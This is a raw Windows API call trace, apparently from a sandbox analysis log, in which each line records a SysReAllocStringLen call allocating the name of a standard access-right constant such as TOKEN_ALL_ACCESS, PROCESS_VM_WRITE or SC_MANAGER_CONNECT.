[0140.847] SysReAllocStringLen (in: pbstr=0x2a9eaf0*=0x0, psz="TOKEN_ADJUST_GROUPS", len=0x13 | out: pbstr=0x2a9eaf0*="TOKEN_ADJUST_GROUPS") returned 1
[0140.847] SysReAllocStringLen (in: pbstr=0x2a9eae0*=0x0, psz="TOKEN_ADJUST_PRIVILEGES", len=0x17 | out: pbstr=0x2a9eae0*="TOKEN_ADJUST_PRIVILEGES") returned 1
[0140.847] SysReAllocStringLen (in: pbstr=0x2a9ead0*=0x0, psz="TOKEN_QUERY_SOURCE", len=0x12 | out: pbstr=0x2a9ead0*="TOKEN_QUERY_SOURCE") returned 1
[0140.847] SysReAllocStringLen (in: pbstr=0x2a9eac0*=0x0, psz="TOKEN_QUERY", len=0xb | out: pbstr=0x2a9eac0*="TOKEN_QUERY") returned 1
[0140.848] SysReAllocStringLen (in: pbstr=0x2a9eab0*=0x0, psz="TOKEN_IMPERSONATE", len=0x11 | out: pbstr=0x2a9eab0*="TOKEN_IMPERSONATE") returned 1
[0140.848] SysReAllocStringLen (in: pbstr=0x2a9eaa0*=0x0, psz="TOKEN_DUPLICATE", len=0xf | out: pbstr=0x2a9eaa0*="TOKEN_DUPLICATE") returned 1
[0140.848] SysReAllocStringLen (in: pbstr=0x2a9ea90*=0x0, psz="TOKEN_ASSIGN_PRIMARY", len=0x14 | out: pbstr=0x2a9ea90*="TOKEN_ASSIGN_PRIMARY") returned 1
[0140.848] SysReAllocStringLen (in: pbstr=0x2a9ea80*=0x0, psz="TOKEN_ALL_ACCESS", len=0x10 | out: pbstr=0x2a9ea80*="TOKEN_ALL_ACCESS") returned 1
[0140.848] SysReAllocStringLen (in: pbstr=0x2a9ea70*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a9ea70*="STANDARD_RIGHTS_EXECUTE") returned 1
[0140.848] SysReAllocStringLen (in: pbstr=0x2a9ea60*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a9ea60*="STANDARD_RIGHTS_WRITE") returned 1
[0140.848] SysReAllocStringLen (in: pbstr=0x2a9ea50*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a9ea50*="STANDARD_RIGHTS_READ") returned 1
[0140.848] SysReAllocStringLen (in: pbstr=0x2a9ea40*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a9ea40*="STANDARD_RIGHTS_ALL") returned 1
[0140.848] SysReAllocStringLen (in: pbstr=0x2a9ea30*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a9ea30*="DELETE") returned 1
[0140.848] SysReAllocStringLen (in: pbstr=0x2a9ea20*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a9ea20*="READ_CONTROL") returned 1
[0140.848] SysReAllocStringLen (in: pbstr=0x2a9ea10*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a9ea10*="WRITE_OWNER") returned 1
[0140.848] SysReAllocStringLen (in: pbstr=0x2a9ea00*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a9ea00*="WRITE_DAC") returned 1
[0140.848] SysReAllocStringLen (in: pbstr=0x2a9e9f0*=0x0, psz="TIMER_MODIFY_STATE", len=0x12 | out: pbstr=0x2a9e9f0*="TIMER_MODIFY_STATE") returned 1
[0140.848] SysReAllocStringLen (in: pbstr=0x2a9e9e0*=0x0, psz="TIMER_QUERY_STATE", len=0x11 | out: pbstr=0x2a9e9e0*="TIMER_QUERY_STATE") returned 1
[0140.848] SysReAllocStringLen (in: pbstr=0x2a9e9d0*=0x0, psz="TIMER_ALL_ACCESS", len=0x10 | out: pbstr=0x2a9e9d0*="TIMER_ALL_ACCESS") returned 1
[0140.848] SysReAllocStringLen (in: pbstr=0x2a9e9c0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a9e9c0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0140.848] SysReAllocStringLen (in: pbstr=0x2a9e9b0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a9e9b0*="STANDARD_RIGHTS_WRITE") returned 1
[0140.848] SysReAllocStringLen (in: pbstr=0x2a9e9a0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a9e9a0*="STANDARD_RIGHTS_READ") returned 1
[0140.848] SysReAllocStringLen (in: pbstr=0x2a9e990*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a9e990*="STANDARD_RIGHTS_ALL") returned 1
[0140.848] SysReAllocStringLen (in: pbstr=0x2a9e980*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a9e980*="DELETE") returned 1
[0140.848] SysReAllocStringLen (in: pbstr=0x2a9e970*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a9e970*="READ_CONTROL") returned 1
[0140.848] SysReAllocStringLen (in: pbstr=0x2a9e960*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a9e960*="WRITE_OWNER") returned 1
[0140.848] SysReAllocStringLen (in: pbstr=0x2a9e950*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a9e950*="WRITE_DAC") returned 1
[0140.848] SysReAllocStringLen (in: pbstr=0x2a9e940*=0x0, psz="SECTION_EXTEND_SIZE", len=0x13 | out: pbstr=0x2a9e940*="SECTION_EXTEND_SIZE") returned 1
[0140.848] SysReAllocStringLen (in: pbstr=0x2a9e930*=0x0, psz="FILE_MAP_READ", len=0xd | out: pbstr=0x2a9e930*="FILE_MAP_READ") returned 1
[0140.848] SysReAllocStringLen (in: pbstr=0x2a9e920*=0x0, psz="FILE_MAP_WRITE", len=0xe | out: pbstr=0x2a9e920*="FILE_MAP_WRITE") returned 1
[0140.848] SysReAllocStringLen (in: pbstr=0x2a9e910*=0x0, psz="FILE_MAP_COPY", len=0xd | out: pbstr=0x2a9e910*="FILE_MAP_COPY") returned 1
[0140.848] SysReAllocStringLen (in: pbstr=0x2a9e900*=0x0, psz="FILE_MAP_ALL_ACCESS", len=0x13 | out: pbstr=0x2a9e900*="FILE_MAP_ALL_ACCESS") returned 1
[0140.848] SysReAllocStringLen (in: pbstr=0x2a9e8f0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a9e8f0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0140.848] SysReAllocStringLen (in: pbstr=0x2a9e8e0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a9e8e0*="STANDARD_RIGHTS_WRITE") returned 1
[0140.848] SysReAllocStringLen (in: pbstr=0x2a9e8d0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a9e8d0*="STANDARD_RIGHTS_READ") returned 1
[0140.848] SysReAllocStringLen (in: pbstr=0x2a9e8c0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a9e8c0*="STANDARD_RIGHTS_ALL") returned 1
[0140.848] SysReAllocStringLen (in: pbstr=0x2a9e8b0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a9e8b0*="DELETE") returned 1
[0140.848] SysReAllocStringLen (in: pbstr=0x2a9e8a0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a9e8a0*="READ_CONTROL") returned 1
[0140.848] SysReAllocStringLen (in: pbstr=0x2a9e890*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a9e890*="WRITE_OWNER") returned 1
[0140.849] SysReAllocStringLen (in: pbstr=0x2a9e880*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a9e880*="WRITE_DAC") returned 1
[0140.849] SysReAllocStringLen (in: pbstr=0x2a9e870*=0x0, psz="MUTEX_MODIFY_STATE", len=0x12 | out: pbstr=0x2a9e870*="MUTEX_MODIFY_STATE") returned 1
[0140.849] SysReAllocStringLen (in: pbstr=0x2a9e860*=0x0, psz="MUTEX_ALL_ACCESS", len=0x10 | out: pbstr=0x2a9e860*="MUTEX_ALL_ACCESS") returned 1
[0140.849] SysReAllocStringLen (in: pbstr=0x2a9e850*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a9e850*="STANDARD_RIGHTS_EXECUTE") returned 1
[0140.849] SysReAllocStringLen (in: pbstr=0x2a9e840*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a9e840*="STANDARD_RIGHTS_WRITE") returned 1
[0140.849] SysReAllocStringLen (in: pbstr=0x2a9e830*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a9e830*="STANDARD_RIGHTS_READ") returned 1
[0140.849] SysReAllocStringLen (in: pbstr=0x2a9e820*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a9e820*="STANDARD_RIGHTS_ALL") returned 1
[0140.849] SysReAllocStringLen (in: pbstr=0x2a9e810*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a9e810*="DELETE") returned 1
[0140.849] SysReAllocStringLen (in: pbstr=0x2a9e800*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a9e800*="READ_CONTROL") returned 1
[0140.849] SysReAllocStringLen (in: pbstr=0x2a9e7f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a9e7f0*="WRITE_OWNER") returned 1
[0140.849] SysReAllocStringLen (in: pbstr=0x2a9e7e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a9e7e0*="WRITE_DAC") returned 1
[0140.849] SysReAllocStringLen (in: pbstr=0x2a9e7d0*=0x0, psz="EVENT_MODIFY_STATE", len=0x12 | out: pbstr=0x2a9e7d0*="EVENT_MODIFY_STATE") returned 1
[0140.849] SysReAllocStringLen (in: pbstr=0x2a9e7c0*=0x0, psz="EVENT_ALL_ACCESS", len=0x10 | out: pbstr=0x2a9e7c0*="EVENT_ALL_ACCESS") returned 1
[0140.849] SysReAllocStringLen (in: pbstr=0x2a9e7b0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a9e7b0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0140.849] SysReAllocStringLen (in: pbstr=0x2a9e7a0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a9e7a0*="STANDARD_RIGHTS_WRITE") returned 1
[0140.849] SysReAllocStringLen (in: pbstr=0x2a9e790*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a9e790*="STANDARD_RIGHTS_READ") returned 1
[0140.849] SysReAllocStringLen (in: pbstr=0x2a9e780*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a9e780*="STANDARD_RIGHTS_ALL") returned 1
[0140.849] SysReAllocStringLen (in: pbstr=0x2a9e770*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a9e770*="DELETE") returned 1
[0140.849] SysReAllocStringLen (in: pbstr=0x2a9e760*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a9e760*="READ_CONTROL") returned 1
[0140.849] SysReAllocStringLen (in: pbstr=0x2a9e750*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a9e750*="WRITE_OWNER") returned 1
[0140.849] SysReAllocStringLen (in: pbstr=0x2a9e740*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a9e740*="WRITE_DAC") returned 1
[0140.849] SysReAllocStringLen (in: pbstr=0x2a9e730*=0x0, psz="SEMAPHORE_MODIFY_STATE", len=0x16 | out: pbstr=0x2a9e730*="SEMAPHORE_MODIFY_STATE") returned 1
[0140.849] SysReAllocStringLen (in: pbstr=0x2a9e720*=0x0, psz="SEMAPHORE_ALL_ACCESS", len=0x14 | out: pbstr=0x2a9e720*="SEMAPHORE_ALL_ACCESS") returned 1
[0140.849] SysReAllocStringLen (in: pbstr=0x2a9e710*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a9e710*="STANDARD_RIGHTS_EXECUTE") returned 1
[0140.849] SysReAllocStringLen (in: pbstr=0x2a9e700*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a9e700*="STANDARD_RIGHTS_WRITE") returned 1
[0140.849] SysReAllocStringLen (in: pbstr=0x2a9e6f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a9e6f0*="STANDARD_RIGHTS_READ") returned 1
[0140.849] SysReAllocStringLen (in: pbstr=0x2a9e6e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a9e6e0*="STANDARD_RIGHTS_ALL") returned 1
[0140.849] SysReAllocStringLen (in: pbstr=0x2a9e6d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a9e6d0*="DELETE") returned 1
[0140.849] SysReAllocStringLen (in: pbstr=0x2a9e6c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a9e6c0*="READ_CONTROL") returned 1
[0140.849] SysReAllocStringLen (in: pbstr=0x2a9e6b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a9e6b0*="WRITE_OWNER") returned 1
[0140.850] SysReAllocStringLen (in: pbstr=0x2a9e6a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a9e6a0*="WRITE_DAC") returned 1
[0140.850] SysReAllocStringLen (in: pbstr=0x2a9e690*=0x0, psz="JOB_OBJECT_SET_SECURITY_ATTRIBUTES", len=0x22 | out: pbstr=0x2a9e690*="JOB_OBJECT_SET_SECURITY_ATTRIBUTES") returned 1
[0140.850] SysReAllocStringLen (in: pbstr=0x2a9e680*=0x0, psz="JOB_OBJECT_TERMINATE", len=0x14 | out: pbstr=0x2a9e680*="JOB_OBJECT_TERMINATE") returned 1
[0140.850] SysReAllocStringLen (in: pbstr=0x2a9e670*=0x0, psz="JOB_OBJECT_QUERY", len=0x10 | out: pbstr=0x2a9e670*="JOB_OBJECT_QUERY") returned 1
[0140.850] SysReAllocStringLen (in: pbstr=0x2a9e660*=0x0, psz="JOB_OBJECT_SET_ATTRIBUTES", len=0x19 | out: pbstr=0x2a9e660*="JOB_OBJECT_SET_ATTRIBUTES") returned 1
[0140.850] SysReAllocStringLen (in: pbstr=0x2a9e650*=0x0, psz="JOB_OBJECT_ASSIGN_PROCESS", len=0x19 | out: pbstr=0x2a9e650*="JOB_OBJECT_ASSIGN_PROCESS") returned 1
[0140.850] SysReAllocStringLen (in: pbstr=0x2a9e640*=0x0, psz="JOB_OBJECT_ALL_ACCESS", len=0x15 | out: pbstr=0x2a9e640*="JOB_OBJECT_ALL_ACCESS") returned 1
[0140.850] SysReAllocStringLen (in: pbstr=0x2a9e630*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a9e630*="STANDARD_RIGHTS_EXECUTE") returned 1
[0140.850] SysReAllocStringLen (in: pbstr=0x2a9e620*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a9e620*="STANDARD_RIGHTS_WRITE") returned 1
[0140.850] SysReAllocStringLen (in: pbstr=0x2a9e610*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a9e610*="STANDARD_RIGHTS_READ") returned 1
[0140.850] SysReAllocStringLen (in: pbstr=0x2a9e600*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a9e600*="STANDARD_RIGHTS_ALL") returned 1
[0140.850] SysReAllocStringLen (in: pbstr=0x2a9e5f0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a9e5f0*="DELETE") returned 1
[0140.850] SysReAllocStringLen (in: pbstr=0x2a9e5e0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a9e5e0*="READ_CONTROL") returned 1
[0140.850] SysReAllocStringLen (in: pbstr=0x2a9e5d0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a9e5d0*="WRITE_OWNER") returned 1
[0140.850] SysReAllocStringLen (in: pbstr=0x2a9e5c0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a9e5c0*="WRITE_DAC") returned 1
[0140.850] SysReAllocStringLen (in: pbstr=0x2a9e5b0*=0x0, psz="THREAD_DIRECT_IMPERSONATION", len=0x1b | out: pbstr=0x2a9e5b0*="THREAD_DIRECT_IMPERSONATION") returned 1
[0140.850] SysReAllocStringLen (in: pbstr=0x2a9e5a0*=0x0, psz="THREAD_IMPERSONATE", len=0x12 | out: pbstr=0x2a9e5a0*="THREAD_IMPERSONATE") returned 1
[0140.850] SysReAllocStringLen (in: pbstr=0x2a9e590*=0x0, psz="THREAD_SET_THREAD_TOKEN", len=0x17 | out: pbstr=0x2a9e590*="THREAD_SET_THREAD_TOKEN") returned 1
[0140.850] SysReAllocStringLen (in: pbstr=0x2a9e580*=0x0, psz="THREAD_QUERY_INFORMATION", len=0x18 | out: pbstr=0x2a9e580*="THREAD_QUERY_INFORMATION") returned 1
[0140.850] SysReAllocStringLen (in: pbstr=0x2a9e570*=0x0, psz="THREAD_SET_INFORMATION", len=0x16 | out: pbstr=0x2a9e570*="THREAD_SET_INFORMATION") returned 1
[0140.850] SysReAllocStringLen (in: pbstr=0x2a9e560*=0x0, psz="THREAD_SET_CONTEXT", len=0x12 | out: pbstr=0x2a9e560*="THREAD_SET_CONTEXT") returned 1
[0140.850] SysReAllocStringLen (in: pbstr=0x2a9e550*=0x0, psz="THREAD_GET_CONTEXT", len=0x12 | out: pbstr=0x2a9e550*="THREAD_GET_CONTEXT") returned 1
[0140.850] SysReAllocStringLen (in: pbstr=0x2a9e540*=0x0, psz="THREAD_SUSPEND_RESUME", len=0x15 | out: pbstr=0x2a9e540*="THREAD_SUSPEND_RESUME") returned 1
[0140.850] SysReAllocStringLen (in: pbstr=0x2a9e530*=0x0, psz="THREAD_TERMINATE", len=0x10 | out: pbstr=0x2a9e530*="THREAD_TERMINATE") returned 1
[0140.850] SysReAllocStringLen (in: pbstr=0x2a9e520*=0x0, psz="THREAD_ALL_ACCESS", len=0x11 | out: pbstr=0x2a9e520*="THREAD_ALL_ACCESS") returned 1
[0140.850] SysReAllocStringLen (in: pbstr=0x2a9e510*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a9e510*="STANDARD_RIGHTS_EXECUTE") returned 1
[0140.850] SysReAllocStringLen (in: pbstr=0x2a9e500*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a9e500*="STANDARD_RIGHTS_WRITE") returned 1
[0140.850] SysReAllocStringLen (in: pbstr=0x2a9e4f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a9e4f0*="STANDARD_RIGHTS_READ") returned 1
[0140.850] SysReAllocStringLen (in: pbstr=0x2a9e4e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a9e4e0*="STANDARD_RIGHTS_ALL") returned 1
[0140.850] SysReAllocStringLen (in: pbstr=0x2a9e4d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a9e4d0*="DELETE") returned 1
[0140.850] SysReAllocStringLen (in: pbstr=0x2a9e4c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a9e4c0*="READ_CONTROL") returned 1
[0140.851] SysReAllocStringLen (in: pbstr=0x2a9e4b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a9e4b0*="WRITE_OWNER") returned 1
[0140.851] SysReAllocStringLen (in: pbstr=0x2a9e4a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a9e4a0*="WRITE_DAC") returned 1
[0140.851] SysReAllocStringLen (in: pbstr=0x2a9e490*=0x0, psz="PROCESS_QUERY_INFORMATION", len=0x19 | out: pbstr=0x2a9e490*="PROCESS_QUERY_INFORMATION") returned 1
[0140.851] SysReAllocStringLen (in: pbstr=0x2a9e480*=0x0, psz="PROCESS_SET_INFORMATION", len=0x17 | out: pbstr=0x2a9e480*="PROCESS_SET_INFORMATION") returned 1
[0140.851] SysReAllocStringLen (in: pbstr=0x2a9e470*=0x0, psz="PROCESS_SET_QUOTA", len=0x11 | out: pbstr=0x2a9e470*="PROCESS_SET_QUOTA") returned 1
[0140.851] SysReAllocStringLen (in: pbstr=0x2a9e460*=0x0, psz="PROCESS_CREATE_PROCESS", len=0x16 | out: pbstr=0x2a9e460*="PROCESS_CREATE_PROCESS") returned 1
[0140.851] SysReAllocStringLen (in: pbstr=0x2a9e450*=0x0, psz="PROCESS_DUP_HANDLE", len=0x12 | out: pbstr=0x2a9e450*="PROCESS_DUP_HANDLE") returned 1
[0140.851] SysReAllocStringLen (in: pbstr=0x2a9e440*=0x0, psz="PROCESS_VM_WRITE", len=0x10 | out: pbstr=0x2a9e440*="PROCESS_VM_WRITE") returned 1
[0140.851] SysReAllocStringLen (in: pbstr=0x2a9e430*=0x0, psz="PROCESS_VM_READ", len=0xf | out: pbstr=0x2a9e430*="PROCESS_VM_READ") returned 1
[0140.851] SysReAllocStringLen (in: pbstr=0x2a9e420*=0x0, psz="PROCESS_VM_OPERATION", len=0x14 | out: pbstr=0x2a9e420*="PROCESS_VM_OPERATION") returned 1
[0140.851] SysReAllocStringLen (in: pbstr=0x2a9e410*=0x0, psz="PROCESS_SET_SESSIONID", len=0x15 | out: pbstr=0x2a9e410*="PROCESS_SET_SESSIONID") returned 1
[0140.851] SysReAllocStringLen (in: pbstr=0x2a9e400*=0x0, psz="PROCESS_CREATE_THREAD", len=0x15 | out: pbstr=0x2a9e400*="PROCESS_CREATE_THREAD") returned 1
[0140.851] SysReAllocStringLen (in: pbstr=0x2a9e3f0*=0x0, psz="PROCESS_TERMINATE", len=0x11 | out: pbstr=0x2a9e3f0*="PROCESS_TERMINATE") returned 1
[0140.851] SysReAllocStringLen (in: pbstr=0x2a9e3e0*=0x0, psz="PROCESS_ALL_ACCESS", len=0x12 | out: pbstr=0x2a9e3e0*="PROCESS_ALL_ACCESS") returned 1
[0140.851] SysReAllocStringLen (in: pbstr=0x2a9e3d0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a9e3d0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0140.851] SysReAllocStringLen (in: pbstr=0x2a9e3c0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a9e3c0*="STANDARD_RIGHTS_WRITE") returned 1
[0140.851] SysReAllocStringLen (in: pbstr=0x2a9e3b0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a9e3b0*="STANDARD_RIGHTS_READ") returned 1
[0140.851] SysReAllocStringLen (in: pbstr=0x2a9e3a0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a9e3a0*="STANDARD_RIGHTS_ALL") returned 1
[0140.851] SysReAllocStringLen (in: pbstr=0x2a9e390*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a9e390*="DELETE") returned 1
[0140.851] SysReAllocStringLen (in: pbstr=0x2a9e380*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a9e380*="READ_CONTROL") returned 1
[0140.851] SysReAllocStringLen (in: pbstr=0x2a9e370*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a9e370*="WRITE_OWNER") returned 1
[0140.851] SysReAllocStringLen (in: pbstr=0x2a9e360*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a9e360*="WRITE_DAC") returned 1
[0140.851] SysReAllocStringLen (in: pbstr=0x2a9e350*=0x0, psz="PERM_FILE_CREATE", len=0x10 | out: pbstr=0x2a9e350*="PERM_FILE_CREATE") returned 1
[0140.851] SysReAllocStringLen (in: pbstr=0x2a9e340*=0x0, psz="PERM_FILE_WRITE", len=0xf | out: pbstr=0x2a9e340*="PERM_FILE_WRITE") returned 1
[0140.851] SysReAllocStringLen (in: pbstr=0x2a9e330*=0x0, psz="PERM_FILE_READ", len=0xe | out: pbstr=0x2a9e330*="PERM_FILE_READ") returned 1
[0140.851] SysReAllocStringLen (in: pbstr=0x2a9e320*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a9e320*="STANDARD_RIGHTS_EXECUTE") returned 1
[0140.851] SysReAllocStringLen (in: pbstr=0x2a9e310*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a9e310*="STANDARD_RIGHTS_WRITE") returned 1
[0140.851] SysReAllocStringLen (in: pbstr=0x2a9e300*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a9e300*="STANDARD_RIGHTS_READ") returned 1
[0140.851] SysReAllocStringLen (in: pbstr=0x2a9e2f0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a9e2f0*="STANDARD_RIGHTS_ALL") returned 1
[0140.851] SysReAllocStringLen (in: pbstr=0x2a9e2e0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a9e2e0*="DELETE") returned 1
[0140.852] SysReAllocStringLen (in: pbstr=0x2a9e2d0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a9e2d0*="READ_CONTROL") returned 1
[0140.852] SysReAllocStringLen (in: pbstr=0x2a9e2c0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a9e2c0*="WRITE_OWNER") returned 1
[0140.852] SysReAllocStringLen (in: pbstr=0x2a9e2b0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a9e2b0*="WRITE_DAC") returned 1
[0140.852] SysReAllocStringLen (in: pbstr=0x2a9e2a0*=0x0, psz="JOB_ACCESS_ADMINISTER", len=0x15 | out: pbstr=0x2a9e2a0*="JOB_ACCESS_ADMINISTER") returned 1
[0140.852] SysReAllocStringLen (in: pbstr=0x2a9e290*=0x0, psz="PRINTER_ACCESS_USE", len=0x12 | out: pbstr=0x2a9e290*="PRINTER_ACCESS_USE") returned 1
[0140.852] SysReAllocStringLen (in: pbstr=0x2a9e280*=0x0, psz="PRINTER_ACCESS_ADMINISTER", len=0x19 | out: pbstr=0x2a9e280*="PRINTER_ACCESS_ADMINISTER") returned 1
[0140.852] SysReAllocStringLen (in: pbstr=0x2a9e270*=0x0, psz="SERVER_ACCESS_ENUMERATE", len=0x17 | out: pbstr=0x2a9e270*="SERVER_ACCESS_ENUMERATE") returned 1
[0140.852] SysReAllocStringLen (in: pbstr=0x2a9e260*=0x0, psz="SERVER_ACCESS_ADMINISTER", len=0x18 | out: pbstr=0x2a9e260*="SERVER_ACCESS_ADMINISTER") returned 1
[0140.852] SysReAllocStringLen (in: pbstr=0x2a9e250*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x2a9e250*="PRINTER_ALL_ACCESS") returned 1
[0140.852] SysReAllocStringLen (in: pbstr=0x2a9e240*=0x0, psz="PRINTER_EXECUTE", len=0xf | out: pbstr=0x2a9e240*="PRINTER_EXECUTE") returned 1
[0140.852] SysReAllocStringLen (in: pbstr=0x2a9e230*=0x0, psz="PRINTER_WRITE", len=0xd | out: pbstr=0x2a9e230*="PRINTER_WRITE") returned 1
[0140.852] SysReAllocStringLen (in: pbstr=0x2a9e220*=0x0, psz="PRINTER_READ", len=0xc | out: pbstr=0x2a9e220*="PRINTER_READ") returned 1
[0140.852] SysReAllocStringLen (in: pbstr=0x2a9e210*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x2a9e210*="PRINTER_ALL_ACCESS") returned 1
[0140.852] SysReAllocStringLen (in: pbstr=0x2a9e200*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a9e200*="DELETE") returned 1
[0140.852] SysReAllocStringLen (in: pbstr=0x2a9e1f0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a9e1f0*="READ_CONTROL") returned 1
[0140.852] SysReAllocStringLen (in: pbstr=0x2a9e1e0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a9e1e0*="WRITE_OWNER") returned 1
[0140.852] SysReAllocStringLen (in: pbstr=0x2a9e1d0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a9e1d0*="WRITE_DAC") returned 1
[0140.852] SysReAllocStringLen (in: pbstr=0x2a9e1c0*=0x0, psz="SC_MANAGER_QUERY_LOCK_STATUS", len=0x1c | out: pbstr=0x2a9e1c0*="SC_MANAGER_QUERY_LOCK_STATUS") returned 1
[0140.852] SysReAllocStringLen (in: pbstr=0x2a9e1b0*=0x0, psz="SC_MANAGER_MODIFY_BOOT_CONFIG", len=0x1d | out: pbstr=0x2a9e1b0*="SC_MANAGER_MODIFY_BOOT_CONFIG") returned 1
[0140.852] SysReAllocStringLen (in: pbstr=0x2a9e1a0*=0x0, psz="SC_MANAGER_LOCK", len=0xf | out: pbstr=0x2a9e1a0*="SC_MANAGER_LOCK") returned 1
[0140.852] SysReAllocStringLen (in: pbstr=0x2a9e190*=0x0, psz="SC_MANAGER_ENUMERATE_SERVICE", len=0x1c | out: pbstr=0x2a9e190*="SC_MANAGER_ENUMERATE_SERVICE") returned 1
[0140.852] SysReAllocStringLen (in: pbstr=0x2a9e180*=0x0, psz="SC_MANAGER_CONNECT", len=0x12 | out: pbstr=0x2a9e180*="SC_MANAGER_CONNECT") returned 1
